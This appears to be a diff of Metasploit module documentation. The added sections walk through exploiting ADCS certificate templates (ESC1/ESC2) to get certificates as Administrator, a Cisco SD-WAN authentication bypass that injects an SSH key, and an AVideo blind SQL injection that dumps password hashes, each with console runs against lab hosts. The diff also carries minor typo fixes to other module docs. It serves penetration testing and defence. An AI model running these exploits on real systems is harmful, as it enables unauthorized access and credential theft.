+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144412_default_10.5.132.180_mit.kerberos.cca_605997.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144413_default_10.5.132.180_mit.kerberos.cca_011223.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
+[+] Available Certificates for  on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/web_enrollment_cert) > set httpusername msfuser
+httpusername => msfuser
+msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
+httppassword => v3Mpassword
+msf auxiliary(admin/http/web_enrollment_cert) > set mode SPECIFIC_TEMPLATE 
+mode => SPECIFIC_TEMPLATE
+msf auxiliary(admin/http/web_enrollment_cert) > set cert_template ESC1-Template
+cert_template => ESC1-Template
+msf auxiliary(admin/http/web_enrollment_cert) > set ALT_UPN Administrator@example.com
+ALT_UPN => Administrator@example.com
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_142147.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_645508.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template ESC1-Template and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_079562.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_912221.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116144918_default_10.5.132.180_windows.ad.cs_076676.pfx
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/web_enrollment_cert) > 
+
+
+```
+
+# Kerberos, ESC2
+```msf
+msf auxiliary(admin/http/web_enrollment_cert) > show options
+
+Module options (auxiliary/admin/http/web_enrollment_cert):
+
+   Name          Current Setting            Required  Description
+   ----          ---------------            --------  -----------
+   ALT_DNS                                  no        Alternative certificate DNS
+   ALT_SID                                  no        Alternative object SID
+   ALT_UPN       Administrator@example.com  no        Alternative certificate UPN (format: USER@DOMAIN)
+   HttpPassword  v3Mpassword                no        The HTTP password to specify for authentication
+   HttpUsername  msfuser                    no        The HTTP username to specify for authentication
+   MODE          SPECIFIC_TEMPLATE          yes       The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
+   ON_BEHALF_OF                             no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                                      no        Certificate to request on behalf of
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxi
+                                                      es: socks5h, sapni, socks4, http, socks5
+   RHOSTS        10.5.132.180               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
+                                                      ics/using-metasploit.html
+   RPORT         80                         yes       The target port (TCP)
+   SSL           false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /certsrv/                  yes       The URI for the cert server.
+   THREADS       1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                    no        HTTP server virtual host
+
+
+   When MODE is SPECIFIC_TEMPLATE:
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CERT_TEMPLATE  ESC1-Template    no        The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/http/web_enrollment_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf auxiliary(admin/http/web_enrollment_cert) > unset ALT_UPN 
+Unsetting ALT_UPN...
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_798433.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_355039.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template User and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_649135.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_950645.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template User saved to /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/web_enrollment_cert) > set PFX /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
+PFX => /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
+msf auxiliary(admin/http/web_enrollment_cert) > set ON_BEHALF_OF EXAMPLE\\Administrator
+ON_BEHALF_OF => EXAMPLE\Administrator
+msf auxiliary(admin/http/web_enrollment_cert) > set cert_template User
+cert_template => User
+msf auxiliary(admin/http/web_enrollment_cert) > run
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_970115.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_854009.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate generated using template User and 
+[+] 10.5.132.180:88 - Received a valid TGT-Response
+[*] 10.5.132.180:80       - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_332600.bin
+[+] 10.5.132.180:88 - Received a valid TGS-Response
+[*] 10.5.132.180:80       - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_241072.bin
+[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
+[+] Certificate for  using template User saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_windows.ad.cs_115992.pfx
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(admin/http/web_enrollment_cert) > 
+
+
+
+
+```
+

documentation/modules/auxiliary/admin/mssql/mssql_exec.md

@@ -21,7 +21,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
 
 ## Verification Steps
 
-1. Do: `use use admin/mssql/mssql_exec`
+1. Do: `use admin/mssql/mssql_exec`
 2. Do: `set USERNAME [username1]`
 3. Do: `set PASSWORD [password1]`
 3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
@@ -32,7 +32,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
 ## Scenarios
 
 ```
-msf > use use use admin/mssql/mssql_exec
+msf > use admin/mssql/mssql_exec
 msf auxiliary(mssql_exec) > set USERNAME username1
 USERNAME => username1
 msf auxiliary(mssql_exec) > set PASSWORD password1

documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md

@@ -0,0 +1,207 @@
+## Vulnerable Application
+
+This module exploits CVE-2026-20127, an authentication bypass vulnerability in the Cisco Catalyst SD-WAN Controller
+(vSmart). The vulnerability exists in the vdaemon DTLS control-plane service running on UDP port 12346.
+
+The vdaemon service fails to properly validate the `verify_status` byte in `CHALLENGE_ACK_ACK` (msg_type=10) messages.
+The `vbond_proc_challenge_ack_ack()` handler reads an attacker-controlled `verify_status` byte from the message body and,
+if non-zero, sets the peer's authenticated flag to 1. Furthermore, the authentication gate in `vbond_proc_msg()` exempts
+msg_type=10 from authentication checks, allowing an unauthenticated peer to send this message.
+
+An attacker can:
+1. Connect via DTLS 1.2 using a self-signed certificate (the server performs no certificate validation at the handshake stage)
+2. Skip the `CHALLENGE_ACK` step entirely
+3. Send a forged `CHALLENGE_ACK_ACK` message with `verify_status=1` to become a trusted peer without any legitimate credentials
+
+Once authenticated, the module leverages a `VMANAGE_TO_PEER` message to inject an SSH public key into the
+`/home/vmanage-admin/.ssh/authorized_keys` file, providing persistent SSH access to the controller's NETCONF service
+on port 830.
+
+### Affected Versions
+
+The vulnerability affects Cisco Catalyst SD-WAN Controller (vSmart) versions prior to the patches released in February 2026.
+Consult [Cisco's security advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk)
+for a complete list of affected versions and patches.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/admin/networking/cisco_sdwan_auth_bypass`
+3. `set RHOST <target_ip>`
+4. Optionally, `set DOMAIN_ID <domain_id>` and `set SITE_ID <site_id>` if you know the target's SD-WAN topology
+5. `check` to verify the target is vulnerable
+6. `run` to exploit the vulnerability and inject an SSH public key
+7. Use the generated SSH private key to connect to the NETCONF service: `ssh -i <key_path> vmanage-admin@<target_ip> -p 830`
+
+## Options
+
+### DOMAIN_ID
+
+The SD-WAN domain ID to use in protocol messages. Default: `1`.
+
+This value must match the domain ID configured on the target controller. In most deployments, the default value of 1
+is used. If you receive a `TEAR_DOWN` message after sending `Hello`, try adjusting this value.
+
+### SITE_ID
+
+The SD-WAN site ID to use in protocol messages. Default: `100`.
+
+This value identifies the site in the SD-WAN topology. The default value should work in most cases, but if the exploit
+fails, you may need to adjust this based on knowledge of the target's SD-WAN configuration.
+
+### SSH_PUBLIC_KEY_FILE
+
+Path to an existing SSH public key file (in OpenSSH format) to inject into the controller.
+
+If not set, the module will automatically generate a new RSA 2048-bit SSH keypair. Using an existing key can be useful
+if you want to maintain access using a key you already control.
+
+## Scenarios
+
+### Cisco Catalyst SD-WAN Controller 20.15.3 (Default Configuration)
+
+In this scenario, we target a vSmart controller with default settings. The module automatically generates an SSH keypair
+and injects the public key.
+
+```
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > show options 
+
+Module options (auxiliary/admin/networking/cisco_sdwan_auth_bypass):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   DOMAIN_ID            1                yes       SD-WAN domain ID
+   RHOSTS               192.168.86.166   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                                   metasploit.html
+   RPORT                12346            yes       The target port (UDP)
+   SITE_ID              100              yes       SD-WAN site ID
+   SSH_PUBLIC_KEY_FILE                   no        Path to an existing SSH public key file to inject
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > check
+[+] 192.168.86.166:12346 - The target is vulnerable. Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
+[*] Running module against 192.168.86.166
+[*] Phase 1: DTLS handshake with self-signed certificate
+[*] DTLS handshake succeeded (self-signed cert accepted)
+[*] Phase 2: Waiting for CHALLENGE from server
+[*] CHALLENGE received (580 bytes of challenge data)
+[*] Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1
+[*] Server Hello received
+[*] Phase 4: Sending Hello as authenticated peer
+[*] Hello response received - we are now a trusted peer
+[*] Phase 5: SSH key injection into vmanage-admin authorized_keys
+[*] Generating RSA 2048-bit SSH keypair
+[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+[+] Connect to NETCONF via:
+chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
+[*] Server responded with: REGISTER_TO_VMANAGE (key has been injected)
+[+] Authentication bypass and SSH key injection completed!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
+
+```
+
+Now we can use the generated SSH key to access the NETCONF service:
+
+```console
+sfewer@sfewer-ubuntu-vm:~$ chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+sfewer@sfewer-ubuntu-vm:~$ ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
+viptela 20.15.3 
+
+<?xml version="1.0" encoding="UTF-8"?>
+<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
+<capabilities>
+<capability>urn:ietf:params:netconf:base:1.0</capability>
+<capability>urn:ietf:params:netconf:base:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:candidate:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:rollback-on-error:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:url:1.0?scheme=ftp,sftp,file</capability>
+<capability>urn:ietf:params:netconf:capability:validate:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:validate:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:xpath:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:notification:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:interleave:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:partial-lock:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:with-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
+<capability>urn:ietf:params:netconf:capability:with-operational-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
+<capability>urn:ietf:params:netconf:capability:yang-library:1.0?revision=2019-01-04&amp;module-set-id=f1952c280658dd3701add48f1c71cbca</capability>
+<capability>urn:ietf:params:netconf:capability:yang-library:1.1?revision=2019-01-04&amp;content-id=f1952c280658dd3701add48f1c71cbca</capability>
+<capability>http://tail-f.com/ns/netconf/actions/1.0</capability>
+<capability>http://tail-f.com/ns/aaa/1.1?module=tailf-aaa&amp;revision=2023-04-13</capability>
+<capability>http://tail-f.com/ns/common/query?module=tailf-common-query&amp;revision=2017-12-15</capability>
+<capability>http://tail-f.com/ns/confd-progress?module=tailf-confd-progress&amp;revision=2020-06-29</capability>
+<capability>http://tail-f.com/ns/confd_dyncfg/1.0?module=confd_dyncfg&amp;revision=2023-09-29</capability>
+<capability>http://tail-f.com/ns/ietf-subscribed-notifications-deviation?module=ietf-subscribed-notifications-deviation&amp;revision=2020-06-25</capability>
+<capability>http://tail-f.com/ns/ietf-yang-push-deviation?module=ietf-yang-push-deviation</capability>
+<capability>http://tail-f.com/ns/kicker?module=tailf-kicker&amp;revision=2020-11-26</capability>
+<capability>http://tail-f.com/ns/mibs/IPV6-TC/199812010000Z?module=IPV6-TC&amp;revision=1998-12-01</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-COMMUNITY-MIB/200308060000Z?module=SNMP-COMMUNITY-MIB&amp;revision=2003-08-06</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-FRAMEWORK-MIB/200210140000Z?module=SNMP-FRAMEWORK-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-MPD-MIB/200210140000Z?module=SNMP-MPD-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-NOTIFICATION-MIB/200210140000Z?module=SNMP-NOTIFICATION-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-TARGET-MIB/200210140000Z?module=SNMP-TARGET-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-USER-BASED-SM-MIB/200210160000Z?module=SNMP-USER-BASED-SM-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-VIEW-BASED-ACM-MIB/200210160000Z?module=SNMP-VIEW-BASED-ACM-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-MIB/200210160000Z?module=SNMPv2-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-SMI/1.0?module=SNMPv2-SMI</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-TC/1.0?module=SNMPv2-TC</capability>
+<capability>http://tail-f.com/ns/mibs/TRANSPORT-ADDRESS-MIB/200211010000Z?module=TRANSPORT-ADDRESS-MIB&amp;revision=2002-11-01</capability>
+<capability>http://tail-f.com/ns/netconf/query?module=tailf-netconf-query&amp;revision=2017-01-06</capability>
+<capability>http://tail-f.com/yang/acm?module=tailf-acm&amp;revision=2013-03-07</capability>
+<capability>http://tail-f.com/yang/common?module=tailf-common&amp;revision=2023-12-07</capability>
+<capability>http://tail-f.com/yang/common-monitoring?module=tailf-common-monitoring&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/common-monitoring2?module=tailf-common-monitoring2&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/confd-monitoring?module=tailf-confd-monitoring&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/confd-monitoring2?module=tailf-confd-monitoring2&amp;revision=2022-10-03</capability>
+<capability>http://tail-f.com/yang/last-login?module=tailf-last-login&amp;revision=2019-11-21</capability>
+<capability>http://tail-f.com/yang/netconf-monitoring?module=tailf-netconf-monitoring&amp;revision=2022-04-12</capability>
+<capability>http://tail-f.com/yang/xsd-types?module=tailf-xsd-types&amp;revision=2017-11-20</capability>
+<capability>http://viptela.com/aaa-ext?module=viptela-aaa-ext&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/actions?module=viptela-actions&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/clear?module=viptela-clear&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/common?module=viptela-common&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/debug?module=viptela-debug&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/devices?module=viptela-devices</capability>
+<capability>http://viptela.com/hardware?module=viptela-hardware&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/idmgr?module=viptela-idmgr&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/models?module=viptela-models</capability>
+<capability>http://viptela.com/omp?module=viptela-omp&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-idmgr?module=viptela-oper-idmgr&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-system?module=viptela-oper-system&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-tenant?module=viptela-oper-tenant</capability>
+<capability>http://viptela.com/oper-vpn?module=viptela-oper-vpn&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/policy?module=viptela-policy&amp;revision=2024-07-01&amp;deviations=viptela-policy-deviation</capability>
+<capability>http://viptela.com/security?module=viptela-security&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/snmp?module=viptela-snmp&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/snmp-usm?module=viptela-snmp-usm&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/support?module=viptela-support&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/system?module=viptela-system&amp;revision=2024-07-01&amp;deviations=viptela-system-deviation</capability>
+<capability>http://viptela.com/tag-instance?module=viptela-tag-instance&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/tenant?module=viptela-tenant&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/timezones?module=viptela-timezones&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/viptela-clear-tenant?module=viptela-clear-tenant</capability>
+<capability>http://viptela.com/viptela-debug-tenant?module=viptela-debug-tenant</capability>
+<capability>http://viptela.com/viptela-global?module=viptela-global&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/vpn?module=viptela-vpn&amp;revision=2024-07-01</capability>
+<capability>urn:ietf:params:xml:ns:netconf:base:1.0?module=ietf-netconf&amp;revision=2011-06-01&amp;features=confirmed-commit,candidate,rollback-on-error,validate,xpath,url</capability>
+<capability>urn:ietf:params:xml:ns:netconf:partial-lock:1.0?module=ietf-netconf-partial-lock&amp;revision=2009-10-19</capability>
+<capability>urn:ietf:params:xml:ns:yang:iana-crypt-hash?module=iana-crypt-hash&amp;revision=2014-08-06&amp;features=crypt-hash-sha-512,crypt-hash-sha-256,crypt-hash-md5</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-inet-types?module=ietf-inet-types&amp;revision=2013-07-15</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-acm?module=ietf-netconf-acm&amp;revision=2018-02-14</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring?module=ietf-netconf-monitoring&amp;revision=2010-10-04</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-notifications?module=ietf-netconf-notifications&amp;revision=2012-02-06</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults?module=ietf-netconf-with-defaults&amp;revision=2011-06-01</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-restconf-monitoring?module=ietf-restconf-monitoring&amp;revision=2017-01-26</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-x509-cert-to-name?module=ietf-x509-cert-to-name&amp;revision=2014-12-10</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-metadata?module=ietf-yang-metadata&amp;revision=2016-08-05</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-smiv2?module=ietf-yang-smiv2&amp;revision=2012-06-22</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&amp;revision=2013-07-15</capability>
+</capabilities>
+<session-id>25</session-id></hello>]]>]]>
+```

documentation/modules/auxiliary/admin/scada/phoenix_command.md

@@ -1,4 +1,4 @@
-PhoenixContact Programmable Logic Controllers are built are using a variant of
+PhoenixContact Programmable Logic Controllers are built using a variant of
 ProConOS. The communicate using a proprietary protocol over ports TCP/1962 and
 TCP/41100 or TCP/20547.  This protocol allows a user to remotely determine the
 PLC type, firmware and build number on port TCP/1962.  A user can also

documentation/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.md

@@ -3,7 +3,7 @@ This module will accept files from a live vCenter appliance or from a vCenter ap
 archive; either or both files can be supplied to the module depending on the situation. The module
 will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
 create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
-contains the vCenter certificate store which from which the module will attempt to extract all vmafd
+contains the vCenter certificate store, from which the module will attempt to extract all vmafd
 certificates that also have a corresponding private key. Portions of this module are based on
 information published by Zach Hanley at Horizon3:
 

documentation/modules/auxiliary/analyze/crack_osx.md

@@ -88,7 +88,7 @@ Default is `false`.
 
 ### PBKDF2-HMAC-SHA512
 
-Crack SHA12 hashes. Default is `true`.
+Crack SHA512 hashes. Default is `true`.
 
 ### POT
 

documentation/modules/auxiliary/gather/avideo_catname_sqli.md

@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated SQL injection vulnerability in AVideo's
+`videos.json.php` endpoint to extract user credentials (usernames and password hashes).
+
+**CVE ID:** CVE-2026-28501
+
+**Affected Versions:** AVideo <= 22.0. Fixed in 24.0.
+
+### Vulnerability Overview
+
+The `catName` parameter is injected unsanitized into SQL queries via the `getCatSQL()` function.
+A global security filter in `security.php` strips quotes from GET/POST parameters, but sending
+`catName` via a JSON request body bypasses this filter because the JSON input is parsed and
+merged into `$_REQUEST` after the security checks have already executed.
+
+The module uses time-based blind SQL injection with `BENCHMARK()` to extract data.
+`SLEEP()` cannot be used because the application's `sqlDAL` layer uses prepared statements
+that prevent it, but `BENCHMARK()` works via a multiplication pattern that embeds the boolean
+condition as a multiplier on the iteration count.
+
+### Setup
+
+This lab reuses the same AVideo Docker environment as the `avideo_encoder_getimage_cmd_injection`
+module.
+
+1. Clone the AVideo repository and checkout the vulnerable commit:
+
+```bash
+cd /tmp
+git clone https://github.com/WWBN/AVideo.git
+cd AVideo
+git checkout 596df4e5b0597c9806da76ebec5bbe3b305953e4
+```
+
+2. Create a `.env` file with the following configuration:
+
+```bash
+cat > .env << EOF
+SERVER_NAME=localhost
+CREATE_TLS_CERTIFICATE=yes
+DB_MYSQL_HOST=database
+DB_MYSQL_PORT=3306
+DB_MYSQL_NAME=avideo
+DB_MYSQL_USER=avideo
+DB_MYSQL_PASSWORD=avideo
+HTTP_PORT=80
+HTTPS_PORT=9443
+NETWORK_SUBNET=172.99.0.0/16
+EOF
+```
+
+3. Fix MariaDB corrupted tc.log issue (required for first-time setup):
+
+```bash
+cat > deploy/docker-entrypoint-mariadb << 'SCRIPTEOF'
+#!/bin/bash
+set -e
+
+if [ -f /var/lib/mysql/tc.log ]; then
+    MAGIC_HEADER=$(head -c 4 /var/lib/mysql/tc.log | od -An -tx1 | tr -d ' \n' 2>/dev/null || echo "")
+    if [ "$MAGIC_HEADER" != "01000000" ] && [ -n "$MAGIC_HEADER" ]; then
+        echo "[Entrypoint]: Removing corrupted tc.log file (bad magic header: $MAGIC_HEADER)"
+        rm -f /var/lib/mysql/tc.log
+    fi
+fi
+SCRIPTEOF
+chmod +x deploy/docker-entrypoint-mariadb
+
+cat >> Dockerfile.mariadb << 'DOCKERFILEEOF'
+
+COPY deploy/docker-entrypoint-mariadb /usr/local/bin/docker-entrypoint-mariadb
+RUN chmod +x /usr/local/bin/docker-entrypoint-mariadb
+RUN sed -i '2i /usr/local/bin/docker-entrypoint-mariadb' /usr/local/bin/docker-entrypoint.sh
+DOCKERFILEEOF
+
+docker compose build database database_encoder
+```
+
+4. Start the Docker Compose environment:
+
+```bash
+docker compose up -d
+```
+
+5. Wait for the services to be ready and access the application at `http://localhost`.
+   Complete the installation wizard if this is a first-time setup.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/gather/avideo_catname_sqli`
+3. `set RHOSTS <target_ip>`
+4. `set RPORT <target_port>` (default: 80)
+5. `run`
+6. **Verify** that user credentials are extracted and displayed
+
+## Options
+
+### COUNT
+
+Number of users to dump. Default: 0 (all users).
+
+### SqliDelay
+
+Time delay threshold for blind injection (default: 1.0 second). Lower values are faster
+but may produce false positives on slow networks.
+
+## Scenarios
+
+### Credential dump against AVideo <= 22.0
+
+```
+msf > use auxiliary/gather/avideo_catname_sqli
+msf auxiliary(gather/avideo_catname_sqli) > set RHOSTS localhost
+RHOSTS => localhost
+msf auxiliary(gather/avideo_catname_sqli) > set RPORT 80
+RPORT => 80
+msf auxiliary(gather/avideo_catname_sqli) > set COUNT 1
+COUNT => 1
+msf auxiliary(gather/avideo_catname_sqli) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] {SQLi} Calibrating BENCHMARK iterations for 1.0s delay...
+[*] {SQLi} Probe: 1000000 iterations took 0.127s
+[*] {SQLi} Calibrated: 23622047 iterations for ~1.0s delay
+[+] The target is vulnerable. Time-based blind SQLi confirmed via BENCHMARK()
+[*] Dumping user credentials from the users table...
+[!] Time-based blind extraction is slow (~4s per character). Be patient.
+[*] {SQLi} [char 1/38] = "a"
+[*] {SQLi} [char 2/38] = "d"
+[*] {SQLi} [char 3/38] = "m"
+[*] {SQLi} [char 4/38] = "i"
+[*] {SQLi} [char 5/38] = "n"
+[*] {SQLi} [char 6/38] = ";"
+[*] {SQLi} [char 7/38] = "5"
+...
+[*] {SQLi} [char 38/38] = "9"
+AVideo Users
+============
+
+    user   password
+    ----   --------
+    admin  5f4dcc3b5aa765d61d8327deb882cf99
+
+[+] Loot saved to: /home/user/.msf4/loot/20260306_default_127.0.0.1_avideo.users_123456.txt
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/camaleon_download_private_file.md

@@ -0,0 +1,216 @@
+## Vulnerable Application
+
+This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
+
+CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
+
+## Setup
+
+See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
+
+The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
+
+### Requirements
+
+- Rails 6.1+
